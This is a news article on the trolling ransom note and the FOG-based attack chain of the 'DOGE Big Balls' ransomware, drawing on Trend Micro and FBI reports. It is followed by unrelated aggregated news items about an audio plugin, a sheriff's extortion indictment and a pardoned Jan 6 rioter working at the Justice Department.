DOGE-Trolling Ransomware Hackers Demand $1 Trillion In Chilling Attack
Update, April 25, 2025: This story, originally published April 23, has been updated with further details regarding the DOGE ransomware attack and information from a new FBI report about the FOG malware threat used following the latest trillion-dollar ransom note demand.
The same criminal group behind the DOGE Big Balls ransomware attack has just upped the ante. A newly updated ransom note sent to victims is now trolling Elon Musk and DOGE by demanding a ridiculous extortion fee of, and I trust you are sitting down, one trillion dollars from victims. This one has Dr Evil written all over it. Here's everything you need to know about the DOGE ransomware attackers, the FOG malware they have adapted, and the nature of that outrageous ransom note demand.
Although there is no doubt that ransomware threats should be taken very seriously, what with a massive surge in ransomware attacks this year, new password-cracking tools being employed to gain initial access, and some very concerning political moves by big names in the extortion-racket industry, not all the players take themselves as seriously it would seem. I certainly hope that's the case as far as the DOGE ransomware attackers and the newly updated ransom note left for victims is concerned.
The ransomware group behind the recent DOGE Big Balls threat, using a variant of existing malware known as FOG, and trying to pin responsibility for the attacks on a well-known member of the Department of Government Efficiency team, has just updated its ransom note. The original threat was already bad enough, using a ZIP file with a deceptive shortcut to execute a multi-stage PowerShell infection chain exploiting a known Windows vulnerability, CVE-2015-2291, to gain kernel-level access and privilege escalation. The attack also, it has to be said, employed the political commentary and conspiracy theory tactic within the ransomware scripts and code. These included such things as 'The CIA didn't kill Kennedy you idiot. Oswald is a very deranged person that felt ostracized by his own country.'
Now, as detailed in an April 21 security report by researchers Nathaniel Morales and Sarah Pearl Camiling at Trend Micro, the ransomware appears to have started trolling DOGE and Elon Musk mercilessly. In reference to the now-infamous Musk demand for federal workers to email DOGE what they had achieved, leaving them fearing for their jobs if they did not comply, the ransom note has been altered to read:
'Give me five bullet points on what you accomplished for work last week or you owe me a TRILLION dollars.'
In an April 23 FBI internet crime report, B. Chad Yarbrough, the FBI
operations director for criminal and cyber, confirmed that ransomware is 'the most pervasive threat to critical infrastructure' and played an increasingly important role in the $16.6 billion cost of cybercrime to individuals and organizations in the U.S. across 2024. Interestingly, the FBI report said that the FOG ransomware threat, a variant of which has been used in the DOGE Big Balls attacks, was the most reported of new ransomware attacks during 2024. The bureau's Internet Crime Complaint Center provides this information to field offices to help the FBI 'identify new ransomware variants, discover the enterprises the threat actors are targeting, and determine whether critical infrastructure is being targeted,' the FBI said.
'The most alarming thing about the FBI's IC3 report is that its numbers are just the tip of the formidable iceberg of organized cybercrime,' Dr Ilia Kolochenko, CEO at ImmuniWeb, said. Warning that a 'growing number' of U.S. organizations prefer to silently settle with ransomware groups that carry a strong reputation for keeping attacks and data confidential following payment, Kolochenko said that it's likely we will see this option continue to be taken. 'In all cases,' Kolochenko advised, 'the final decision to pay or not to pay should be brainstormed with cybercrime experts and lawyers having experience in such matters. Otherwise, you are running a sprint on thin ice.' In the case of the DOGE attacks, maybe less consideration is required when the demand is for a trillion dollars.
'The ransomware payload embedded in the samples has been verified as FOG ransomware,' the Trend Micro report warned, 'an active ransomware family targeting both individuals and organizations.'
'FOG ransomware is a relatively new ransomware family that enterprises must add to their watchlist,' Trend Micro said, adding that 'the impact of a successful ransomware attack could still potentially cost enterprises financial loss and operational disruption,' regardless of the DOGE references and the trolling nature of the ransom note itself.
The security researchers noted that the FOG ransomware itself has compromised some 100 victims in the first three months of the year, before the DOGE-trolling started, it would seem. In January, there were 18 victims, 53 in February and 29 in March.
Trend Micro said that the de-obfuscated script in the ransom note executed a PowerShell command which performs a multi-stage operation: retrieving a ransomware loader (cwiper.exe), ktool.exe and other PowerShell scripts. 'It also opens politically themed YouTube videos and includes written political commentary directly in the script,' the report stated, which adds to the trolling-element of the attack.
FOG also takes your security very seriously, at least as far as stopping defenders from analyzing the malware is concerned. 'We have observed that prior to dropping its payload,' the security researchers confirmed, 'the malware investigated checks various indicators, such as processor count, RAM, MAC address, registry, and tick count, to detect a sandbox.' If any of these security checks should fail, then FOG will exit the entire process.
As such, it's imperative that you do not think that just because the attackers might act like clowns, the threat itself isn't serious.
Indeed, the ransomware demand itself is all business. 'We are the ones who encrypted your data and also copied some of it to our internal resource,' the attackers state. They then advise the victim that the sooner they are contacted, the sooner they can get everything resolved, offering instructions on using a Tor browser to get the next steps.
The DOGE references are not the only trolling in the updated ransom note, there's also a 'Don't snitch now' warning. This could be in response to the ransomware informer platform that I have previously reported on. The humor — I guess that's what it is an attempt at — continues with a warning from the attackers that they have 'grabbed your trilatitude and trilongitude (the most accurate) coordinates of where you live,' in order to prove that they are lying. Not lying and not funny, but not to be ignored either.
Hashtags
Try Our AI Features
Explore what Daily8 AI can do for you:
Comments
No comments yet...
Related Articles
Yahoo
5 minutes ago
- Yahoo
iZotopeʼs colourful new FXEQ multi-effects plugin lets you 'paint' with saturation, reverb, and delay
When you buy through links on our articles, Future and its syndication partners may earn a commission. New from iZotope comes an innovative multi-effects plugin that marks the next addition to its Catalyst series, a collection of easy-to-use plugins designed to help you quickly solve mix problems and remain in the creative flow. Intriguingly, FXEQ allows users to 'paint' reverb, delay, lo-fi and other effects directly onto sounds using an intuitive EQ-style interface, unlocking creative flexibility and sidestepping the "complex plugin routing and endless plugin stacks" required to achieve a similar effect. In total, there are five creative effects on board, each with multiple modes and two central controls. Each effect module runs through its own six-band parametric EQ with four shapes and adjustable Q, giving you targeted control over its application across the frequency spectrum. Those five effects are: Saturate, Reverb, Delay, Modulate, and Lo-Fi, with all of them accessible and tweakable through Catalyst's familiar EQ-style interface. FXEQ's Saturation module offers eight saturation modes designed to give your sounds "weight, bite and fizz", while the Reverb module features three distinct reverb algorithms, covering Hall, Plate and Chamber modes. The plugin's Modulate module brings chorus, flanger, phaser and doubler modes to the table, while Delay delivers four delay types spanning Classic, Reverse, Crunch and Modulation, complemented by Time and Feedback controls. Finally, a Lo-Fi effect recreates the nostalgic tones of vinyl, cassette, tape and radio. All five of FXEQ's modules has its own parallel signal path, processing the input signal independently before the results are combined and passed through a global zero-latency limiter at the output stage. Compatible with macOS and Windows and available in AAX/AU/VST3 formats, iZotope's FXEQ is priced at $49/£49. Find out more at Solve the daily Crossword
Fox News
11 minutes ago
- Fox News
Kash Patel slams ‘corrupt' sanctuary sheriff indicted for cannabis company extortion
Boston's sanctuary sheriff was arrested Friday on federal charges after allegedly leveraging his elected position to extort $50,000 from a cannabis executive who was seeking state approval to open a dispensary—a scheme FBI Director Kash Patel called a betrayal of public trust. Suffolk County Sheriff Steven Tompkins, 67, who oversees more than 1,000 employees in the Boston-area, was handcuffed Friday morning in the Southern District of Florida after a federal grand jury indicted him on two counts of extortion under color of official right, according to a statement from the U.S. Attorney's Office for the District of Massachusetts. "When someone entrusted with enforcing the law is accused of breaking it for personal gain, it undermines the public's trust in every honest officer who wears the badge," Patel told Fox News Digital. "The FBI will pursue corruption at every level, because no one is above the law. The people of Suffolk County, and the country, deserve leaders who serve them, not themselves." Tompkins was appointed sheriff of the Suffolk County Sheriff's Department (SCSD) in 2013, elected in a 2014 special election, and later re-elected to serve successive six-year terms. He made headlines in 2019 after booting Immigration and Customs Enforcement (ICE) agents out of the county jail, signing an eviction notice that required hundreds of illegal immigrant detainees to be moved out within 60 days, according to a report from the Boston Herald. According to court documents, a cannabis company applied in 2019 for a retail dispensary license in Boston through the Massachusetts Cannabis Control Commission (CCC). To meet the state's Positive Impact Plan (PIP) requirement, the company partnered with the sheriff's department, which agreed to screen and refer graduates from its re-entry program for work at the dispensary's retail store. The company's partnership with SCSD was formalized in a letter signed by Tompkins in 2019 and submitted with its dispensary license application in 2020. The cannabis commission approved the license in 2021 and renewed it in 2022 and 2023, with the company citing the partnership to meet the PIP requirement in each application. To raise capital for an initial public offering (IPO) and expand as a publicly traded company, executives sought multimillion-dollar investments from institutions and other high-net-worth investors—not the general public, according to court documents. By mid-2020, the company was preparing for its IPO by producing audited financial statements, hiring attorneys and obtaining additional financing. Prosecutors allege Tompkins pressured the cannabis executive for stock, reminding the executive he had helped the company in its licensing efforts. The executive feared Tompkins might exploit his position as sheriff to undermine the partnership with the department, putting both the license and the company's planned IPO in jeopardy. In October 2020, the company asked Tompkins for an updated partnership letter to submit with its license renewal application, according to court documents. Within a month of signing the letter, and after alleged pressure on the executive, Tompkins obtained a pre-IPO stake in the company. Prosecutors claim that in November 2020, Tompkins wired $50,000 from his retirement account to an account controlled by the executive, purchasing nearly 29,000 shares at $1.73 each. Following a reverse stock split, he held about 14,400 shares valued at $3.46 each. Once the company launched its IPO in 2021, the stock value jumped to $9.60 per share, increasing the value of Tompkins' $50,000 purchase of 14,417 shares to $138,403. By May 2022, the value of Tompkins' stock had dropped thousands of dollars below his $50,000 investment, but he allegedly demanded a full refund. The executive agreed, issuing five checks between May 2022 and July 2023. Prosecutors claim some checks were marked as "loan repayment" and "[company] expense" at Tompkins's direction to disguise the nature of some of the payments. U.S. Attorney Leah Foley wrote in a statement that elected officials, particularly those in law enforcement, are expected to be ethical, honest and law-abiding, "not self-serving." "His alleged actions are an affront to the voters and taxpayers who elected him to his position, and the many dedicated and honest public servants at the Suffolk County Sheriff's Department. The people of Suffolk County deserve better," Foley wrote. "Public corruption remains a top priority for my administration, and we will continue to investigate and prosecute anyone who uses their position of trust and power for their own gain." FBI Boston special agent in charge Ted Docks added the act was "clear-cut corruption." "From his very first day as Suffolk County Sheriff, Steven Tompkins sought to portray himself as a man of the people–a principled public servant and reformer, devoted to the cause of justice. That's why it's beyond disappointing that he's now accused of gaming a system instituted in the interests of public safety and fair play," Docks wrote in a statement. "We believe what the Sheriff saw as an easy way to make a quick buck on the sly is clear-cut corruption under federal law. The citizens of Suffolk County deserve better, not a man who is accused of trading on his position to bankroll his own political and financial future. Public servants must be held to the highest of ethical standards, and those falling short will be rooted out." Tompkins, who faces a sentence of up to 20 years in prison for each count, will appear in Boston federal court at a later date.
Yahoo
31 minutes ago
- Yahoo
He told Jan 6 rioters to ‘kill' cops. After Trump's pardon, he got hired at the Justice Department
Jared Lane Wise was scheduled to go to trial 10 days before Donald Trump returned to the White House. Wise admitted to urging rioters to 'kill' law enforcement at the Capitol on January 6, 2021 and faced six counts in connection with the riots. The former FBI agent berated police as 'Nazis' and 'Gestapo' and testified that he would be 'morally justified' if he had assaulted them in defense of what he viewed as excessive force, according to court documents. Wise was pardoned by the president on his first day in office, along with nearly every rioter charged in connection with the assault. Now, he is working as a senior adviser in the Department of Justice, NPR has learned. 'Jared Wise is a valued member of the Department of Justice and we appreciate his contributions to our team,' according to a DOJ statement shared with The Independent by the White House. Trump's Justice Department moved to dismiss Wise's case on January 20, and the judge overseeing the case granted the request. Wise worked for the FBI from 2004 through 2017. By the time he joined the Jan 6, 2021 assault on Congress, as lawmakers convened to certify the results of the 2020 election, Wise was working as a consultant in Oregon. He had traveled to Washington, D.C., to support Trump, according to court filings. According to surveillance footage shared in court documents, Wise joined a mob that broke into the Capitol, and 'clapped his hands and raised his arms in triumph' as he walked into the Senate wing. Two hours later, he clashed with police officers outside the building. 'You guys are disgusting,' he said, according to footage from police-worn body cameras. 'I'm former law enforcement. You're disgusting. You are the Nazi. You are the Gestapo. … Shame on you! Shame on you! Shame on you!' As a group of rioters pushed against police and knocked at least one officer to the ground, Wise turned towards the violence and shouted 'f*** them' and 'kill 'em,' according to court filings. 'Kill 'em! Kill 'em! Kill 'em!' he shouted. In 2023, federal prosecutors obtained an indictment against Wise for civil disorder, disorderly conduct on Capitol grounds, and aiding and abetting an assault on law enforcement officers. He pleaded not guilty, and trial was scheduled for January 17, 2025. According to his testimony in court transcripts, Wise admitted what he said was 'terrible' and that he 'shouldn't say those things.' 'I think I was careless and used, like, terrible words when I was angry,' he said. He described his call to 'kill 'em' as an 'angry reaction." 'I don't want people to die,' he said. Wise did not assault police himself, though he said that he would have been 'morally justified' to do so if he saw what he believed was excessive force against rioters. His decision to enter the Capitol was 'irrational' and 'it was probably obvious' that he was not supposed to be there, he said. It's unclear what role Wise is performing at the DOJ, though messages obtained by NPR indicate that his title is senior adviser in the office of the deputy attorney general, and that he has been working on internal reviews of alleged 'weaponization' of law enforcement. The Independent has requested additional comment from the Justice Department. Trump has appointed right-wing activist Ed Martin — who served on a board providing financial support to Jan 6 defendants — as a pardon attorney and director of the administration's 'Weaponization Working Group.' Martin was serving as the acting U.S. attorney for Washington, D.C., before Trump pulled his nomination and brought in Fox News personality Jeannine Piro to serve as the capital's top prosecutor. Martin and Pirro succeeded Matthew Graves, who led the largest federal investigation in Justice Department history with the prosecution of more than 1,600 people in connection with the Jan 6 attack. The assault on the Capitol was fueled by Trump's ongoing false claim that the 2020 election was rigged against him. Trump issued 'full pardons' for virtually all Jan 6 rioters on the night of his inauguration. Trump's Attorney General Pam Bondi has also fired dozens of career prosecutors who worked on Jan 6 cases while the administration scrubs evidence and public statements about the attack from government websites. More than 1,000 defendants pleaded guilty to charges in connection with the attack, and more than 200 others were found guilty at trial — including 10 defendants who were found guilty of seditious conspiracy. The Trump administration has also agreed to pay $5 million to settle a wrongful death suit brought by the family of Ashli Babbitt, who was fatally shot by a Capitol police officer while trying to break into the House chambers.
